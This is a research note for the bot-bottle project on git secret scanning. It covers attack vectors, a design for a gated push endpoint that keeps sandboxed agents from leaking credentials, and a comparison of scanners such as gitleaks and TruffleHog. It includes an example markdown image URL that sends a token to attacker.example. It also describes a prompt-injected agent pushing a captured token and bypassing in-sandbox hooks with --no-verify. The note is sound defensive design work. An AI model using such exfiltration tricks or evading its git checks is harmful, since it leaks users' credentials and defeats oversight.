bot-bottle/docs/research/git-secret-scanning-hardening.md

# Git secret scanning as further hardening

Research into whether bot-bottle should add a secret-scanning step to
its git workflow — both on the host repo and (potentially) inside
bottles — and what tools exist for it. Motivated by the threat model
below: a secret accidentally `git push`ed to a public remote is
*already compromised* the moment the push hits the wire, well before
anyone clicks "merge."

## Summary

A pre-commit / pre-push secret scanner is a cheap, high-leverage layer
of defense-in-depth that doesn't replace any existing control
(`.gitignore`, environment-variable hygiene, network egress guards) but
catches the one case where everything else fails: a credential ending
up in a tracked file or commit message and being pushed to a public
remote. For bot-bottle specifically, `gitleaks` is the clearest fit
— Go binary, MIT, scans full history including commit messages, runs
fully offline, and integrates with the existing `.githooks/` directory
without adding a new runtime.

## Attack vector: a secret pushed to a public GitHub repo

The naive mental model is "if I notice the leak before the PR is
merged, I can force-push and the secret is gone." That mental model is
wrong in two distinct ways, and both apply *the instant* `git push`
completes — not at merge time.

### 1. The push itself publishes the secret

The moment a commit lands on a public GitHub repo — on any branch, in
any open PR, on any fork — it is publicly fetchable by URL and
broadcast by GitHub's event firehose:

- The commit blob is reachable at `github.com/<owner>/<repo>/commit/<sha>`
  and via the raw API. No login or merge required.
- GitHub's public events API streams every push as it happens. The
  GH Archive project mirrors that stream and republishes it; multiple
  Common-Crawl-style datasets ingest from it on a continuous basis.
- Independent scrapers (and there are *many*) sit on the events API
  watching specifically for commits whose diffs match high-value
  credential patterns — AWS keys, GitHub PATs, Stripe keys, OAuth
  tokens, OpenAI keys, etc. Empirically, observed time-to-abuse for a
  leaked AWS key on a public push is on the order of *seconds to
  minutes*. The window in which "I'll just force-push" still works
  effectively does not exist.
- Even after a force-push, the orphaned commit remains reachable by
  SHA until GitHub's garbage collection runs (and the SHA itself
  leaks via the events API). Treat any secret that has touched a
  public remote as burned: rotate it.

This is the dominant risk, and on its own it is enough to justify
pre-push secret scanning.

### 2. Render-time callbacks fire even on un-merged PRs

A separate, sneakier vector: a public PR doesn't have to be *merged*
to cause an outbound request to a server the pusher controls. Opening
the PR is enough. Rendering surfaces along the review path will fetch
remote resources embedded in the diff or in PR metadata:

- **Markdown files in the diff** are rendered with image and link
  preview support. An `![](https://attacker.example/pixel.png?token=…)`
  in a new README pings the attacker the moment a reviewer (or
  GitHub's own renderer warming a cache) views the file. GitHub
  proxies most image fetches through `camo.githubusercontent.com`,
  which mitigates direct IP capture but *does not stop the fetch
  itself* — the attacker still gets the request, and the URL path
  can carry exfiltrated bytes.
- **PR body, commit message, and issue body** all render markdown
  with the same image/link semantics. A poisoned commit message
  with an embedded image URL pings home when the PR is opened in the
  web UI, regardless of merge state.
- **Link unfurls** in PR descriptions, Slack notifications wired to
  the repo, and various CI bots all dereference URLs at preview time.
  Each is an independent "ping home" opportunity.
- **CI on PR open** runs on the fork's HEAD by default for many
  workflow types. Any `curl` in a build step is an exfil channel
  before a human ever looks at the PR.

The composite point: by the time a reviewer thinks "hmm, this looks
suspicious, let me close without merging," the bytes that mattered are
already on the attacker's box. Detection has to be at *commit* time
(or *push* time at the latest), not at review time.

### Why this matters for bot-bottle

Two surfaces are exposed:

1. **The bot-bottle repo itself.** Development happens on a host
   with `BOT_BOTTLE_CLAUDE_OAUTH_TOKEN`, Gitea tokens, and other
   credentials in the environment. A fixture, test snapshot, log
   capture, or pasted-in debug output could carry one of them into a
   tracked file. The repo's Gitea remote is private, but mirrors or
   GitHub forks may not be.
2. **Bottles that push to external remotes.** An agent inside a bottle
   that has been granted git push credentials to a public repo is one
   prompt-injection away from being induced to commit a captured token
   and push it. The egress guard catches *most* exfiltration channels
   (`statsig`, `npm`, arbitrary HTTPS), but `git push` to an
   allowlisted code host is by design an outbound channel that *works*.
   That is the whole point of letting the agent push code. A secret
   scanner inside the bottle's git hooks is the only layer that can
   intercept content before it leaves on an otherwise-legitimate
   channel.

The first surface is the primary one for this note. The second
*looks* harder — anything inside the bottle is by assumption
adversary-controlled, so an in-bottle hook can be bypassed with
`--no-verify`, removed outright, or simply not configured — but it
yields to the same trick already used for the OAuth token and HTTPS
inspection: move the check across a kernel-enforced process boundary
that the agent cannot reach.

### Solution for the bottle surface: a git gate

Route bottle-side `git push` through an intermediary git endpoint —
a "git gate" — that runs gitleaks on the incoming objects before
forwarding to the real remote:

- The bottle's git remote is rewritten to point at the gate (e.g.
  `git@gate.bottle.local:owner/repo.git`, or an HTTPS endpoint on a
  loopback / sidecar address). The agent inside the bottle sees only
  the gate URL.
- The gate runs as a separate process / container that the bottle's
  unprivileged agent cannot read or modify. It holds the real push
  credential (deploy key, PAT, ssh agent socket) — the bottle never
  sees it, same as the auth-injecting proxy for `ANTHROPIC_BASE_URL`
  in `agent-credential-proxy-landscape.md`.
- On receive, the gate runs `gitleaks detect` against the incoming
  refs (and their message text) in a temporary working tree. Clean
  pushes are forwarded to the real remote. Findings cause the push to
  be rejected; the agent sees a normal-looking `remote: rejected`
  message.
- Network egress out of the bottle is locked to the gate only.
  Direct pushes to `github.com`, `gitlab.com`, etc., fail at the
  egress layer, so the agent cannot bypass the gate by reconfiguring
  the remote URL. The egress guard already in `network-egress-guard.md`
  is the load-bearing control here.

Properties this gives:

- **`--no-verify` does not help the attacker** — the check runs on the
  *receiving* side, not in a client hook.
- **Bypass attempts fail closed.** Removing the remote, force-pushing,
  pushing to a different host, or shelling out around git all hit the
  same egress allowlist.
- **The push credential never enters the bottle.** Compromising the
  agent doesn't compromise the credential, only the ability to ask the
  gate to push on its behalf — and the gate refuses dirty pushes.
- **Pattern is reusable.** The gate is shape-compatible with the
  auth-injecting proxy and with pipelock's TLS interception: a
  sidecar that holds the credential, enforces a policy on traffic,
  and is unreachable by the unprivileged in-bottle UID.

Open questions deferred to design work, not blockers for this note:

- SSH vs HTTPS for the bottle→gate hop. SSH lets the agent use a
  per-bottle key the gate authenticates; HTTPS over loopback is
  simpler and pairs naturally with pipelock.
- Whether the gate should also enforce repo / branch allowlists per
  bottle, or stay narrowly focused on secret scanning. Probably
  narrow first, expand later.
- Performance on large pushes. gitleaks on a few-MB diff is sub-second;
  on a large monorepo first push it may take seconds. Acceptable.

## Tool landscape (2026)

| Tool | Install | Full history | Commit msgs | Detection | Status | License |
|---|---|---|---|---|---|---|
| **gitleaks** | `brew install gitleaks` | yes (`--log-opts="--all"`) | yes | regex + entropy, ~150 rules | very active (v8.x) | MIT |
| **TruffleHog v3** | `brew`, Docker, GH Action | yes | yes | regex + **live API verification** (700+ types) | very active | AGPL-3.0 |
| **detect-secrets** (Yelp) | `pip install` | working tree + baseline | no | regex + entropy | active, slower cadence | Apache 2.0 |
| **git-secrets** (AWS Labs) | `brew` | yes (`--scan-history`) | yes | regex only, AWS-focused | maintenance mode since ~2021 | Apache 2.0 |
| **ggshield** (GitGuardian) | `pip install` | yes | yes | proprietary ML + regex, optional verified | very active, commercial | MIT CLI, SaaS engine |

Other names that surfaced but do not fit: Semgrep (general SAST, not
git-history-native), `whispers` (Python, low adoption).

Notes on the contenders:

- **gitleaks** is the de-facto open-source standard. The `protect
  --staged` mode is purpose-built for pre-commit; the `detect
  --log-opts="--all"` mode walks every commit including message text.
  No network dependency.
- **TruffleHog v3** is the strongest one-shot auditor because it can
  make live API calls to confirm whether a found credential is still
  valid. AGPL is fine for internal use but a consideration if the
  detection step gets embedded in a redistributable artifact. Best as
  a "run once on history" tool, not as the everyday hook.
- **detect-secrets** is well-loved for its baseline-file workflow (you
  declare existing secrets as known and only fail on new ones), but
  commit-message scanning is not first-class.
- **git-secrets** is effectively superseded by gitleaks. No reason to
  start a new project on it.
- **ggshield** is good if you want a hosted dashboard and incident
  management, but it ships repo content to GitGuardian's API by
  default — wrong fit for a project whose entire premise is sandbox
  isolation.

## Commit message scanning

Several real-world leaks have come from secrets pasted into commit
messages (often by automation that includes captured CLI output in
auto-generated messages). gitleaks, TruffleHog, git-secrets, and
ggshield all scan message text in history mode. detect-secrets does
not — it is content-focused. Anyone using detect-secrets should pair
it with a separate message-scanning step.

## Recommended path forward

In priority order, for the host bot-bottle repo:

1. **One-time retro scan** with gitleaks:
   `gitleaks detect --source . --log-opts="--all" --redact`.
   Catches anything currently in history including commit messages.
   `--redact` keeps any findings out of the rendered output. Treat any
   hit as a rotated credential, not as a "fix the commit" problem (see
   attack-vector section above for why).
2. **Add a pre-commit hook in `.githooks/`** that runs
   `gitleaks protect --staged`. Fits the project's existing pattern
   (the conventional-commits `commit-msg` hook lives there), needs no
   new runtime, fully offline.
3. **Optional one-time live-verification pass** with TruffleHog:
   `trufflehog git file://. --only-verified`. Tells you whether any
   historically leaked credential is still active — actionable in a
   way pattern-matching alone is not.

For the bottle surface, the follow-up is the git-gate design sketched
above: a sidecar git endpoint that bottles push to, that runs
gitleaks on incoming refs before forwarding to the real remote, with
egress locked to the gate so the agent cannot push directly. Tracked
as a future PRD; ordering it after the network egress guard is
correct because the egress allowlist is the control that prevents
bypass and is therefore the prerequisite.

## Sources

- [gitleaks — GitHub repository](https://github.com/gitleaks/gitleaks)
- [TruffleHog — GitHub repository](https://github.com/trufflesecurity/trufflehog)
- [detect-secrets — GitHub repository](https://github.com/Yelp/detect-secrets)
- [git-secrets — AWS Labs GitHub repository](https://github.com/awslabs/git-secrets)
- [GitGuardian ggshield](https://github.com/GitGuardian/ggshield)
- [GH Archive — public GitHub event firehose mirror](https://www.gharchive.org/)
- [GitHub camo image proxy documentation](https://github.com/atmos/camo)
- [Truffle Security — "How fast are leaked secrets abused?"](https://trufflesecurity.com/blog/)